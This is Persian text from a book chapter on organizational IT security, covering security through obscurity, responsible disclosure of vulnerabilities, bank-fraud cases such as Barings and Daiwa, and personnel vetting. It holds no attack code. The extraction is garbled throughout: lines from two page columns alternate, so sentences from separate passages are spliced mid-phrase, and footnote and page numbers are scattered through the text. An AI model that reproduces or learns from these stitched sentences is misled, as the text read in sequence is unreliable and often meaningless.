ﻛﺎﺭ ﺑﺎ ﻧﺮﻡﺍﻓﺰﺍﺭ ﻣﻮﺭﺩ ﻧﻴﺎﺯ ﻛﺎﺭ ﺩﻳﮕﺮﻱ ﺑﺎ ﺭﺍﻳﺎﻧﻪ ﻧﻤـﻲﻛﻨﻨـﺪ ﻭ ﻳـﺎ ﻛﻪ ﺫﺍﺗﹰﺎ ﻣﺴﺘﺤﻜﻢ ﻫﺴﺘﻨﺪ ﻣﻲﺗﻮﺍﻥ ﺍﻣﻨﻴﺖ ﺑﻴﺸﺘﺮﻱ ﺑﺮﻗﺮﺍﺭ ﻛـﺮﺩ،
ﻧﺮﻡﺍﻓﺰﺍﺭﺷﺎﻥ ﺑﺮ ﺍﺳﺎﺱ ﺗﻨﻈﻴﻤﺎﺕ ﻣﻮﺟﻮﺩ ﮔﻮﺍﻫﻲ ﺩﺭﻳﺎﻓﺖ ﻛـﺮﺩﻩ ﺣﺘﻲ ﺍﮔﺮ ﻣﻬﺎﺟﻢ ﺍﺯ ﺁﻧﻬﺎ ﺁﮔﺎﻫﻲ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ .ﺍﻳـﻦ ﺣﻘﻴﻘـﺖ ﻛـﻪ
ﻭ ﻟﺬﺍ ﻧﻤﻲﺗﻮﺍﻧﻨﺪ ﭘﻴﻜﺮﺑﻨﺪﻱ ﺁﻧﺮﺍ ﺗﻐﻴﻴـﺮ ﺩﻫﻨـﺪ -ﺣﺘـﻲ ﻗـﺎﺩﺭ ﺑـﻪ ﺷﻤﺎ ﺍﺯ ﻣﻜﺎﻧﻴﺰﻣﻬﺎﻱ ﻣﺴﺘﺤﻜﻤﻲ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﻴﺪ ﻛـﻪ ﻫﻤـﻪ ﺍﺯ
ﺁﻥ ﺁﮔﺎﻫﻲ ﺩﺍﺭﻧﺪ ﻣﻤﻜﻦ ﺍﺳﺖ ﻣﻬـﺎﺟﻢ ﺭﺍ ﻧﺎﺍﻣﻴـﺪ ﻛﻨـﺪ ﻭ ﺑﺎﻋـﺚ
ﺍﺭﺗﻘﺎﻱ ﻧﺮﻡﺍﻓﺰﺍﺭ ﺧﻮﺩ ﻫﻢ ﻧﺒﺎﺷﻨﺪ .ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﻌﻀﻲ ﺳﻴﺴﺘﻤﻬﺎ
ﺷﻮﺩ ﺟﺎﻱ ﺩﻳﮕﺮﻱ ﻏﻴـﺮ ﺍﺯ ﺳﻴـﺴﺘﻤﻬﺎﻱ ﺷـﻤﺎ ﺑـﺪﻧﺒﺎﻝ ﻫﻴﺠـﺎﻥ
ﺗﻮﺳﻂ ﺍﻓﺮﺍﺩﻱ ﺭﺍﻫﺒﺮﻱ ﺷﻮﻧﺪ ﻛـﻪ ﻣﻬـﺎﺭﺕ ﻻﺯﻡ ﺑـﺮﺍﻱ ﺍﻋﻤـﺎﻝ
ﻧﺎﺷﻲ ﺍﺯ ﻧﻔﻮﺫ ﺑﺎﺷﺪ .ﺍﮔﺮ ﭘﻮﻟﻬﺎﻳﺘﺎﻥ ﺭﺍ ﺩﺭ ﻳـﻚ ﻛـﺸﻮﻱ ﻗﻔـﻞﺩﺍﺭ
ﻭﺻﻠﻪﻫﺎ ﺭﺍ ﻧﺪﺍﺷﺘﻪ ﺑﺎﺷﻨﺪ ،ﻭ ﺍﺯ ﺳﺎﻳﺮ ﺳﻴﺴﺘﻤﻬﺎ ﻫﻢ ﺍﺳﺘﻔﺎﺩﺓ ﻓﻌﺎﻝ
ﭘﻨﻬﺎﻥ ﻛﻨﻴﺪ ﺍﻣﻨﻴﺖ ﺁﻥ ﺑﻴﺸﺘﺮ ﺍﺯ ﺯﻣﺎﻧﻲ ﺍﺳﺖ ﻛﻪ ﻛﺴﻲ ﻧﺪﺍﻧـﺪ ﺍﺯ
ﻧﺸﻮﺩ ﻭ ﻳﺎ ﺧﺎﺭﺝ ﺍﺯ ﺣﻴﻄﺔ ﭘـﺸﺘﻴﺒﺎﻧﻲ ﺳـﺎﺯﻣﺎﻥ ﺑﺎﺷـﻨﺪ .ﻫﻤﻴـﺸﻪ
ﭘﻮﻟﻬﺎﻳﺘﺎﻥ ﺩﺭ ﻳﻚ ﻗﻮﻃﻲ ﺳﺲ ﻣـﺎﻳﻮﻧﺰ ﺩﺭ ﻳﺨﭽـﺎﻝ ﻧﮕﻬـﺪﺍﺭﻱ
ﻣﺴﺌﻮﻻﻧﻪ ﻋﻤﻞ ﻛﻨﻴﺪ .ﺑﻬﺘﺮ ﺍﺳﺖ ﻳﻚ ﻭﺻﻠﻪ ﺭﺍ ﺑﺪﻭﻥ ﺗﻮﺿﻴﺢ ﺩﺭ
ﻣﻲﻛﻨﻴﺪ!
ﻣﻮﺭﺩ ﺯﻳﺮﺑﻨﺎﻱ ﺁﺳﻴﺐﭘﺬﻳﺮﻱ ﻣﺮﺑﻮﻃﻪ ﻣﻴﺎﻥ ﻛﺎﺭﻛﻨﺎﻥ ﺗﻮﺯﻳﻊ ﻛﻨﻴﻢ،
ﺗﺎ ﺍﻳﻨﻜﻪ ﺑﺨﻮﺍﻫﻴﻢ ﺑﻪ ﻣﻬﺎﺟﻤﺎﻥ ﺟﺰﺋﻴﺎﺗﻲ ﺩﺭ ﻣﻮﺭﺩ ﺭﻭﺷﻬﺎﻱ ﻧﻔﻮﺫ
ﺍﻓﺸﺎﻱ ﻣﺴﺌﻮﻻﻧﻪ
ﺑﻪ ﺳﻴﺴﺘﻤﻬﺎﻱ ﻭﺻﻠﻪﻧﺸﺪﻩ ﺍﺭﺍﺋﻪ ﻧﻤﺎﻳﻴﻢ.
ﻣﻘﺼﻮﺩ ﺍﺯ ﺍﻳﺮﺍﺩﻱ ﻛﻪ ﺑﻪ "ﺍﻣﻨﻴﺖ ﻣﺒﺘﻨﻲ ﺑﺮ ﺟﻬـﻞ ﻣﻬـﺎﺟﻢ" ﻭﺍﺭﺩ
ﻣﺎ ﻣﻮﺍﺭﺩ ﺯﻳﺎﺩﻱ ﺩﻳﺪﻩ ﺍﻳـﻢ ﻛـﻪ ﺩﺭ ﺁﻥ ﻓـﺮﺩﻱ ﻣﺘﺨـﺼﺺ ﻳـﻚ
ﺷﺪ ﺍﻳﻦ ﻧﻴﺴﺖ ﻛﻪ ﺑﮕﻮﻳﻴﻢ ﺑﻼﻓﺎﺻﻠﻪ ﺑﻌﺪ ﺍﺯ ﺍﻳﻨﻜـﻪ ﺣﻔـﺮﻩﻫـﺎﻱ
ﺍﺷﻜﺎﻝ ﻣﻬﻢ ﺍﻣﻨﻴﺘﻲ ﺭﺍ ﺩﺭ ﻳﻚ ﮔﺮﻭﻩ ﭘﺴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ﺑـﺴﻴﺎﺭ
ﺍﻣﻨﻴﺘﻲ ﺭﺍ ﭘﻴﺪﺍ ﻛﺮﺩﻳـﺪ ﺁﻧـﺮﺍ ﺑﻄـﻮﺭ ﮔـﺴﺘﺮﺩﻩ ﺑـﻪ ﺍﻃـﻼﻉ ﻋﻤـﻮﻡ
ﻋﻤﻮﻣﻲ ﮔﺰﺍﺭﺵ ﻛﺮﺩﻩ ﺍﺳﺖ .ﺍﮔﺮﭼﻪ ﻫﺪﻑ ﺍﻳﻦ ﺷﺨﺺ ﺩﺭﻳﺎﻓﺖ
ﺑﺮﺳﺎﻧﻴﺪ .ﻣﻴﺎﻥ ﻣﺨﻔﻲﻛﺎﺭﻱ ﻭ ﺍﺣﺘﻴﺎﻁ ﺗﻔﺎﻭﺗﻬـﺎﻱ ﻋﻤـﺪﻩ ﻭﺟـﻮﺩ
ﻳﻚ ﺍﺻﻼﺡ ﺳﺮﻳﻊ ﺍﺯ ﺟﺎﻧﺐ ﻓﺮﻭﺷﻨﺪﮔﺎﻥ ﺑﻮﺩﻩ ،ﻭﻟﻲ ﻧﺘﻴﺠـﺔ ﻛـﺎﺭ
ﺩﺍﺭﺩ .ﺍﮔﺮ ﺩﺭ ﻳﻚ ﻧﺮﻡﺍﻓﺰﺍﺭ ﺗﻮﺯﻳﻊﺷﺪﻩ ﻳﺎ ﭘﺮﻣﺼﺮﻑ ﺣﻔﺮﺓ ﺍﻣﻨﻴﺘـﻲ
ﻣﻮﺟﻲ ﺍﺯ ﺗﻬﺎﺟﻤﺎﺕ ﺑﻪ ﺳﻴﺴﺘﻤﻬﺎﻳﻲ ﺷﺪﻩ ﻛﻪ ﺭﺍﻫﺒـﺮﺍﻥ ﺁﻧﻬـﺎ ﺑـﻪ
ﻛﺸﻒ ﻛﺮﺩﻳﺪ ﺑﺎﻳﺪ ﺑﺪﻭﻥ ﺳﺮ ﻭ ﺻﺪﺍ ﻭ ﻫﺮﭼـﻪ ﺳـﺮﻳﻌﺘﺮ ﺁﻧـﺮﺍ ﺑـﻪ
ﻣﻄﺎﻟﺐ ﺁﻥ ﮔﺮﻭﻩ ﭘﺴﺘﻲ ﺩﺳﺘﺮﺳﻲ ﻧﺪﺍﺷﺘﻪ ﻭ ﻳﺎ ﻗـﺎﺩﺭ ﺑـﻪ ﺍﻋﻤـﺎﻝ
ﺍﺻﻼﺡ ﺍﺭﺍﺋﻪﺷﺪﻩ ﻧﺒﻮﺩﻩﺍﻧﺪ.
ﺍﮔﺮ ﻫﻨﻮﺯ ﻭﺻﻠﻪﺍﻱ ﺑﺮﺍﻱ ﺁﺳﻴﺐﭘـﺬﻳﺮﻳﻬﺎﻱ ﺍﺧﻴـﺮ ﺳﻴـﺴﺘﻢ ﺷـﻤﺎ ﺗﺎ ﺯﻣﺎﻧﻲ ﻛﻪ ﺷﻤﺎ ﻫﻤﺔ ﻗﺴﻤﺘﻬﺎﻱ ﻳﻚ ﻧﺮﻡﺍﻓـﺰﺍﺭ ﺭﺍ ﺑﻮﺳـﻴﻠﺔ ﺧـﻮﺩ ﻭ ﺩﺭ ۸۷
ﺍﻳﺴﺘﮕﺎﻩ ﻛﺎﺭﻱ ﺧﻮﺩﺗﺎﻥ ﺗﻮﺳﻌﻪ ﻧﺪﻫﻴﺪ ،ﺍﻓﺮﺍﺩ ﻣﺨﺘﻠﻔﻲ ﻣﻤﻜﻦ ﺍﺳﺖ ﺑـﻪ
ﻭﺟﻮﺩ ﻧﺪﺍﺷﺘﻪ ﺑﺎﺷﺪ ،ﺍﺭﺳﺎﻝ ﺟﺰﺋﻴﺎﺕ ﺁﻧﻬﺎ ﺑﻪ ﻳـﻚ ﮔـﺮﻭﻩ ﭘـﺴﺘﻲ
ﻣﺘﻦ ﺑﺮﻧﺎﻣﻪ ﺩﺳﺘﺮﺳﻲ ﭘﻴﺪﺍ ﻛﺮﺩﻩ ﺑﺎﺷﻨﺪ ﻭ ﺍﻳﻦ ﺍﺣﺘﻤﺎﻝ ﻭﺟـﻮﺩ ﺩﺍﺭﺩ ﻛـﻪ
ﻧﻪﺗﻨﻬﺎ ﺑﺴﻴﺎﺭﻱ ﭘﺎﻳﮕﺎﻫﻬﺎﻱ ﺩﻳﮕﺮ ﺭﺍ ﺑﻪ ﻣﺨﺎﻃﺮﻩ ﺧﻮﺍﻫﺪ ﺍﻧﺪﺍﺧﺖ، ﻣﺘﻦ ﺑﺮﻧﺎﻣﻪ ﺗﺼﺎﺩﻓﹰﺎ ﻳﺎ ﺗﻌﻤﺪﹰﺍ ﺍﻓﺸﺎ ﺷﻮﺩ.
١٥٧ ﺑﺨﺶ ﺳﻮﻡ :ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺳﺎﺯﻣﺎﻧﻬﺎ
ﻫﺮﭼﻨﺪ ﻣﺎ ﻫﻨﻮﺯ ﻭﻗﻮﻉ ﭼﻨﻴﻦ ﻣﻮﺭﺩﻱ ﺭﺍ ﻧﺪﻳﺪﻩﺍﻳﻢ ،ﺍﻣﺎ ﻭﻛﻴﻼﻥ ﻣﺘﻌﺪﺩﻱ ۸۸
ﺑﻪ ﻣﺎ ﮔﻔﺘﻪﺍﻧﺪ ﻛﻪ ﺍﻧﺘﻈﺎﺭ ﺩﺍﺭﻧﺪ ﻣﻮﻛﻼﻧﺸﺎﻥ ﺍﻧﺠـﺎﻡ ﭼﻨـﻴﻦ ﻛـﺎﺭﻱ ﺭﺍ ﺍﺯ
ﺁﻧﻬﺎ ﺑﺨﻮﺍﻫﻨﺪ.
١٥٩ ﺑﺨﺶ ﺳﻮﻡ :ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺳﺎﺯﻣﺎﻧﻬﺎ
ﭘﺎ ﮔﺬﺍﺷﺘﻪ ﺷﺪﻩ ﺑﻮﺩ ،ﻫﻴﭻ ﺍﻗـﺪﺍﻡ ﻋﻤﻠـﻲ ﻋﻠﻴـﻪ ﺍﻭ ﺍﻧﺠـﺎﻡ ﺑﺎﺭﻳﻨﮕﺰ ٩٠ﺷﻌﺒﺔ ﺳﻨﮕﺎﭘﻮﺭ ،ﻭ ﺗﻮﺷﻴﻬﺎﻳﺪ ﺍﻳﮕﻮﭼﻲ ٩١ﺍﺯ ﺩﻓﺘﺮ
ﻧﺸﺪ ﻭ ﺩﺭ ﺁﺧﺮﻳﻦ ﺭﻭﺯ ﺭﻳﺎﺳـﺖ ﺟﻤﻬـﻮﺭﻱ ﻛﻠﻴﻨﺘـﻮﻥ ﻧﻴـﺰ ﻧﻴﻮﻳﻮﺭﻙ ﺑﺎﻧﻚ ﺩﺍﻳﻮﺍ ٩٢ﻫﺮ ﺩﻭ ﺍﻗﺪﺍﻡ ﺑﻪ ﺳﺮﻣﺎﻳﻪﮔﺬﺍﺭﻳﻬﺎﻱ
ﻣﻮﺭﺩ ﻋﻔﻮ ﻭﻱ ﻗﺮﺍﺭ ﮔﺮﻓﺖ. ﭘﺮ ﻣﺨﺎﻃﺮﻩﺍﻱ ﻛﺮﺩﻧﺪ ﻛﻪ ﻣﻨﺠﺮ ﺑﻪ ﺍﺯ ﺩﺳﺖ ﺩﺍﺩﻥ ﻣﻘﺎﺩﻳﺮ
ﻗﺎﺑﻞ ﺗﻮﺟﻬﻲ ﺍﺯ ﺳﺮﻣﺎﻳﺔ ﺑﺎﻧﻜﻬﺎﻳﺸﺎﻥ ﺷﺪ؛ ﺍﻣﺎ ﺁﻧﻬﺎ ﺑﺠـﺎﻱ
ﺍﮔﺮ ﺷﻤﺎ ﺍﻳﻦ ﻣﻮﺍﺭﺩ ﻭ ﺳﺎﻳﺮ ﻗﺎﻧﻮﻥﺷﻜﻨﻴﻬﺎ ﻭ ﺗﺨﻠﻔﺎﺕ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺭﺍ ﭘــﺬﻳﺮﺵ ﺷﻜــﺴﺖ ،ﺳــﻮﺍﺑﻖ ﺣــﺴﺎﺑﻬﺎﻱ ﺭﺍﻳﺎﻧــﻪﺍﻱ ﺭﺍ
ﻃﻲ ﭼﻨﺪ ﺩﻫﺔ ﺍﺧﻴﺮ ﺑﺮﺭﺳﻲ ﻛﻨﻴﺪ ،ﻳﻚ ﻭﻳﮋﮔﻲ ﻣﺸﺘﺮﻙ ﺩﺭ ﺁﻧﻬـﺎ ﻝ ﺑـﺎﺯ ﻫـﻢﻼ ﺑﺎ ﺍﻧﺠﺎﻡ ﺍﻳﻨﻜﺎﺭ ﭘـﻮ ﹺ
ﺩﺳﺘﻜﺎﺭﻱ ﻛﺮﺩﻧﺪ ﻭ ﻋﻤ ﹰ
ﻣﻲﺑﻴﻨﻴﺪ :ﻫﻤﺔ ﺁﻧﻬﺎ ﺗﻮﺳﻂ ﺍﻓﺮﺍﺩ ﺑﻮﻗﻮﻉ ﭘﻴﻮﺳﺘﻪﺍﻧﺪ .ﻋﻮﺍﻣﻞ ﻧﻔـﻮﺫ، ﺑﻴﺸﺘﺮﻱ ﺭﺍ ﺑﺮﺍﻱ ﺟﺒﺮﺍﻥ ﺿﺮﺭﻫﺎﻱ ﻗﺒﻠﻲ ﻭﺍﺭﺩ ﺍﻳـﻦ ﻗﻤـﺎﺭ
ﺍﻓﺮﺍﺩ ﺑﻮﺩﻩﺍﻧﺪ؛ ﻭﻳﺮﻭﺳـﻬﺎﻱ ﺭﺍﻳﺎﻧـﻪﺍﻱ ﺭﺍ ﺍﻓـﺮﺍﺩ ﻧﻮﺷـﺘﻪ ﺑﻮﺩﻧـﺪ؛ ﻭ ﻧﻤﻮﺩﻧﺪ؛ ﻭ ﺳﺮﺍﻧﺠﺎﻡ ﻧﻴﺰ ﺑﻌﺪ ﺍﺯ ﻭﺍﺭﺩ ﺁﻭﺭﺩﻥ ﺑﻴﺶ ﺍﺯ ﻳـﻚ
ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ﺭﺍ ﻧﻴﺰ ﺍﻓﺮﺍﺩ ﺩﺯﺩﻳﺪﻩ ﺑﻮﺩﻧﺪ. ﻣﻴﻠﻴﺎﺭﺩ ﺩﻻﺭ ﺯﻳﺎﻥ ﺑـﻪ ﻫﺮﻳـﻚ ﺍﺯ ﺍﻳـﻦ ﺩﻭ ﺑﺎﻧـﻚ ﻣـﻮﺭﺩ
ﺍﻣﻨﻴﺖ ﻛﺎﺭﻛﻨﺎﻥ" ﻋﺒﺎﺭﺕ ﺍﺳـﺖ ﺍﺯ ﻫﻤـﺔ ﻣﻮﺍﺭﺩﻳﻜـﻪ ﻣﺮﺑـﻮﻁ ﺑـﻪ ﺷﻨﺎﺳﺎﻳﻲ ﻗﺮﺍﺭ ﮔﺮﻓﺘﻨﺪ .ﺩﺭ ﻧﺘﻴﺠـﺔ ﺍﻳـﻦ ﺍﻗـﺪﺍﻣﺎﺕ ﺑﺎﻧـﻚ
ﻛﺎﺭﻛﻨﺎﻥ ﻣﻲ ﺷﻮﺩ :ﺍﺳﺘﺨﺪﺍﻡ ،ﺁﻣﻮﺯﺵ ،ﻛﻨﺘﺮﻝ ﺭﻓﺘﺎﺭ ،ﻭ ﮔﺎﻫﻲ ﻧﻴﺰ ﺑﺎﺭﻳﻨﮕﺰ ﻣﺠﺒﻮﺭ ﺑﻪ ﺍﻋﻼﻡ ﻭﺭﺷﻜﺴﺘﮕﻲ ﺷﺪ ﻭ ﺑﺎﻧﻚ ﺩﺍﻳـﻮﺍ
ﺍﺧﺮﺍﺝ .ﺁﻣﺎﺭ ﻧﺸﺎﻥ ﻣﻲﺩﻫﺪ ﻛﻪ ﻣﻬﻤﺘﺮﻳﻦ ﺩﺳﺘﺔ ﻣﺮﺗﻜﺒﻴﻦ ﺟـﺮﺍﺋ ﹺﻢ ﻧﻴﺰ ﻣﺠﻮﺯ ﺍﻧﺠﺎﻡ ﻓﻌﺎﻟﻴﺖ ﺍﻗﺘﺼﺎﺩﻱ ﺩﺭ ﺍﻳـﺎﻻﺕ ﻣﺘﺤـﺪﻩ ﺭﺍ
ﺳﻨﮕﻴﻦ ﺭﺍﻳﺎﻧﻪﺍﻱ ﻛﺴﺎﻧﻲ ﻫﺴﺘﻨﺪ ﻛﻪ ﻳﺎ ﺍﺯ ﺩﺳﺘﺮﺳﻲ ﻗـﺎﻧﻮﻧﻲ ﺑـﻪ ﺑﺮﺍﻱ ﻫﻤﻴﺸﻪ ﺍﺯ ﺩﺳﺖ ﺩﺍﺩ.
ﺩﺍﺩﻩﻫﺎ ﺑﺮﺧﻮﺭﺩﺍﺭﻧـﺪ ﻭ ﻳـﺎ ﺩﺭ ﮔﺬﺷـﺘﺔ ﻧﺰﺩﻳـﻚ ﺍﺯ ﺁﻥ ﺑﺮﺧـﻮﺭﺩﺍﺭ
ﻛﻨﻜﺎﺵ ﻗﺮﺍﺭ ﺩﻫﻴﺪ .ﻫﻤﭽﻨﻴﻦ ﻻﺯﻡ ﺍﺳﺖ ﺍﻋﺘﺒﺎﺭ ﻫﺮ ﮔﻮﺍﻫﻴﻨﺎﻣﻪ ﻭ ﺑﻮﺩﻩﺍﻧﺪ .ﺑﻌﻀﻲ ﻣﻄﺎﻟﻌـﺎﺕ ﻧـﺸﺎﻥ ﻣـﻲﺩﻫـﺪ ﻛـﻪ ﺑـﻴﺶ ﺍﺯ %۸۰
ﻣﺪﺭﻙ ﺗﺤﺼﻴﻠﻲ ﺭﺍ ﺑﺴﻨﺠﻴﺪ؛ ﺯﻳﺮﺍ ﺗﺎﻛﻨﻮﻥ ﺑﺴﻴﺎﺭ ﭘﻴﺶ ﺁﻣﺪﻩ ﻛـﻪ ﺭﺧﺪﺍﺩﻫﺎ ﺗﻮﺳﻂ ﭼﻨﻴﻦ ﺍﻓﺮﺍﺩﻱ ﺭﺥ ﻣـﻲﺩﻫـﺪ .ﺑﻨـﺎﺑﺮﺍﻳﻦ ﻗـﺴﻤﺖ
ﺍﻓﺮﺍﺩﻱ ﺩﺭ ﻣﻮﺭﺩ ﻣﺪﺍﺭﻙ ﺗﺤﺼﻴﻠﻲ ﺧﻮﺩ ﺍﺯ ﺩﺍﻧﺸﮕﺎﻩﻫـﺎﻱ ﻣﻌﺘﺒـﺮ ﻣﻬﻤﻲ ﺍﺯ ﻳﻚ ﻃﺮﺡ ﺍﻣﻨﻴﺘﻲ ﺧﻮﺏ ﻋﺒﺎﺭﺕ ﺍﺳﺖ ﺍﺯ ﺍﺩﺍﺭﺓ ﻛﺎﺭﻛﻨﺎﻥ
ﺳﺨﻦ ﺭﺍﻧﺪﻩﺍﻧﺪ ،ﺩﺭﺣﺎﻟﻴﻜـﻪ ﺁﻥ ﺩﺍﻧـﺸﮕﺎﻫﻬﺎ ﻫـﻴﭻ ﺳـﺎﺑﻘﻪﺍﻱ ﺩﺭ ﺑﺎ ﺩﺳﺘﺮﺳﻴﻬﺎﻱ ﻃﺒﻘﻪﺑﻨﺪﻱﺷﺪﻩ.
ﺍﺧﺘﻴﺎﺭ ﻧﺪﺍﺷﺘﻨﺪ ﻛﻪ ﻧﺸﺎﻥ ﺩﻫﺪ ﺣﺘﻲ ﻳﻚ ﻭﺍﺣﺪ ﺩﺭﺳﻲ ﺗﻮﺳﻂ ﺁﻥ ﺍﻓﺮﺍﺩ ﺑﻪ ﺩﻭ ﺻﻮﺭﺕ ﺩﺭ ﺑﺮﻭﺯ ﻣـﺸﻜﻼﺕ ﺍﻣﻨﻴـﺖ ﺭﺍﻳﺎﻧـﻪﺍﻱ ﺗـﺄﺛﻴﺮ
ﺍﻓﺮﺍﺩ ﺑﺼﻮﺭﺕ ﻛﺎﻣﻞ ﮔﺬﺭﺍﻧﺪﻩ ﺷﺪﻩ ﺍﺳﺖ! ﺑﻌﻀﻲ ﺍﻓﺮﺍﺩ ﻧﻴﺰ ﻣﻤﻜﻦ ﺩﺍﺭﻧﺪ .ﺑﻌﻀﻲ ﺍﺯ ﺁﻧﻬﺎ ﺑـﺎ ﺩﻧﺒـﺎﻝ ﻧﻜـﺮﺩﻥ ﺭﻭﺍﻟﻬـﺎﻱ ﺍﻣﻨﻴﺘـﻲ ،ﺑـﻪ
ﺍﺳﺖ ﻣﺪﺍﺭﻛﻲ ﺍﺭﺋﻪ ﻛﻨﻨﺪ ﻛﻪ ﻣﺮﺑﻮﻁ ﺑﻪ ﺩﺍﻧﺸﮕﺎﻫﻬﺎﻳﻲ ﺑﺎﺷـﺪ ﻛـﻪ ﻓﺮﺍﻣﻮﺷﻲ ﺳﭙﺮﺩﻥ ﻣﻼﺣﻈﺎﺕ ﺍﻣﻨﻴﺘﻲ ،ﻭ ﻣﻄﻠـﻊ ﻧﺒـﻮﺩﻥ ﺍﺯ ﻧﺘـﺎﻳﺞ
ﺗﻨﻬﺎ ﺍﻧﺪﻛﻲ ﺑﺰﺭﮔﺘﺮ ﺍﺯ ﻳﻚ ﺩﻓﺘﺮ ﭘـﺴﺘﻲ ﻫـﺴﺘﻨﺪ! ﺗﻮﺟـﻪ ﺩﺍﺷـﺘﻪ ﻛﺎﺭﻫﺎﻳﻲ ﻛﻪ ﺍﻧﺠﺎﻡ ﻣﻲﺩﻫﻨﺪ ،ﺳﻬﻮﹰﺍ ﺑﻪ ﻭﻗﻮﻉ ﺭﺧﺪﺍﺩﻫﺎﻱ ﺍﻣﻨﻴﺘـﻲ
ﺑﺎﺷﻴﺪ ﺍﺯ ﻛﺴﻲ ﻛﻪ ﺑﺮﺍﻱ ﺑﻪ ﺍﺳﺘﺨﺪﺍﻡ ﺩﺭ ﺁﻣﺪﻥ ﺩﺭ ﻳﻚ ﺷﻐﻞ ﺑﻪ ﻛﻤﻚ ﻣﻲﻛﻨﻨﺪ .ﺑﻌﻀﻲ ﺩﻳﮕﺮ ﻧﻴﺰ ﺁﮔﺎﻫﺎﻧـﻪ ﻛﻨﺘﺮﻟﻬـﺎ ﻭ ﺭﻭﺍﻟﻬـﺎ ﺭﺍ
ﺩﺭﻭﻍ ﻣﺘﻮﺳﻞ ﻣﻲﺷﻮﺩ ﻧﻤﻲﺗﻮﺍﻥ ﺩﺭ ﻣـﺸﺎﻏﻞ ﺣـﺴﺎﺱ ﺍﺳـﺘﻔﺎﺩﻩ ﺯﻳﺮ ﭘﺎ ﻣﻲﮔﺬﺍﺭﻧﺪ ﺗﺎ ﺑﻪ ﻭﻗﻮﻉ ﻳﻚ ﺭﺧﺪﺍﺩ ﻛﻤﻚ ﻛﺮﺩﻩ ﺑﺎﺷـﻨﺪ ﻳـﺎ
ﻛﺮﺩ. ﻼ ﺍﺷـﺎﺭﻩﺧﻮﺩ ﺑﺘﻨﻬﺎﻳﻲ ﺑﺎﻋﺚ ﻭﻗﻮﻉ ﺁﻥ ﺷﻮﻧﺪ .ﻫﻤﺎﻧﻄﻮﺭ ﻛـﻪ ﻗـﺒ ﹰ
ﺗﺤﻘﻴﻘﺎﺕ ﻣﺘﻤﺮﻛﺰ ﻛــﺮﺩﻳﻢ ﺩﺭ ﺑﻴــﺸﺘﺮ ﻣــﻮﺍﺭﺩ ﺍﻓــﺮﺍﺩﻱ ﻛــﻪ ﺑــﺼﻮﺭﺕ ﺁﮔﺎﻫﺎﻧــﻪ ﺩﺭ
ﺩﺭ ﺑﺮﺧﻲ ﻣﻮﺍﺭﺩ ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﺨﻮﺍﻫﻴﺪ ﺗﺤﻘﻴﻘﺎﺕ ﺟـﺪﻱﺗـﺮﻱ ﺩﺭ ﻣﺸﻜﻼﺕ ﺍﻣﻨﻴﺘﻲ ﺷﻤﺎ ﻧﻘﺶ ﺩﺍﺭﻧﺪ ﻛﺴﺎﻧﻲ ﻫﺴﺘﻨﺪ ﻛـﻪ ﻛﺎﺭﻣﻨـﺪ
ﺧﻮﺩﺗﺎﻥ ﻣﻲﺑﺎﺷﻨﺪ )ﻳﺎ ﺗﺎ ﻫﻤﻴﻦ ﺍﻭﺍﺧﺮ ﺑﻮﺩﻩﺍﻧﺪ( :ﺍﻓﺮﺍﺩﻱ ﻛﻪ ﺍﺯ ﻛﻨﺘﺮﻟﻬﺎ
ﺭﺍﺑﻄﻪ ﺑﺎ ﺷﺨﺼﻴﺖ ﻭ ﭘﻴﺸﻴﻨﺔ ﻣﺘﻘﺎﺿﻴﺎﻥ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ .ﺑـﺎ ﺗﻮﺟـﻪ
ﻣﻄﻠﻌﻨﺪ ﻭ ﻣﻲ ﺩﺍﻧﻨﺪ ﭼﻪ ﺍﻃﻼﻋﺎﺗﻲ ﺑﺎ ﭼﻪ ﺍﺭﺯﺷﻲ ﻣﻤﻜﻦ ﺍﺳﺖ ﺩﺭ
ﺑﻪ ﺳﻄﺢ ﺷﻐﻠﻲ ﻛﻪ ﻗـﺮﺍﺭ ﺍﺳـﺖ ﻣﺘﻘﺎﺿـﻲ ﺩﺭ ﺁﻥ ﻗـﺮﺍﺭ ﮔﻴـﺮﺩ ﻭ
ﻛﺪﺍﻡ ﻗﺴﻤﺖ ﻭﺟﻮﺩ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ.
ﺩﺳﺘﺮﺳﻴﻬﺎﻳﻲ ﻛﻪ ﻗﺮﺍﺭ ﺍﺳﺖ ﺑﻪ ﺳﻴﺴﺘﻤﻬﺎ ﻭ ﺩﺍﺩﻩﻫـﺎﻱ ﺣـﺴﺎﺱ
ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ ﺷﺎﻳﺪ ﺑﺨﻮﺍﻫﻴﺪ: ﻼ ﻳـﻚ ﺳﻴـﺴﺘﻢ Unixﺭﺍ ﺭﺍﻫﺒـﺮﻱ ﺷﻤﺎ ﺩﺭ ﻃﻮﻝ ﻣﺪﺗﻲ ﻛﻪ ﻣﺜ ﹰ
ﺍﺯ ﻛﻤﻚ ﻳـﻚ ﺳـﺎﺯﻣﺎﻥ ﻭﻳـﮋﺓ ﺍﻧﺠـﺎﻡ ﺗﺤﻘﻴﻘـﺎﺕ ﺑـﺮﺍﻱ •
ﻣﻲﻛﻨﻴﺪ ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﺎ ﺍﻓﺮﺍﺩﻱ ﺍﺯ ﻫﺮ ﺩﻭ ﮔـﺮﻭﻩ ﻣﻮﺍﺟـﻪ ﺷـﻮﻳﺪ.
ﺑﺮﺭﺳﻲ ﭘﻴﺸﻴﻨﺔ ﺍﻓﺮﺍﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻴﺪ؛ ﻛﻨﺘﺮﻟﻬﺎ ﻭ ﻣﻜﺎﻧﻴﺰﻣﻬﺎﻱ ﻣﺮﺑﻮﻁ ﺑﻪ ﺍﻣﻨﻴﺖ ﻛﺎﺭﻛﻨﺎﻥ ﺑﺴﻴﺎﺭ ﻣﺘﻌـﺪﺩ
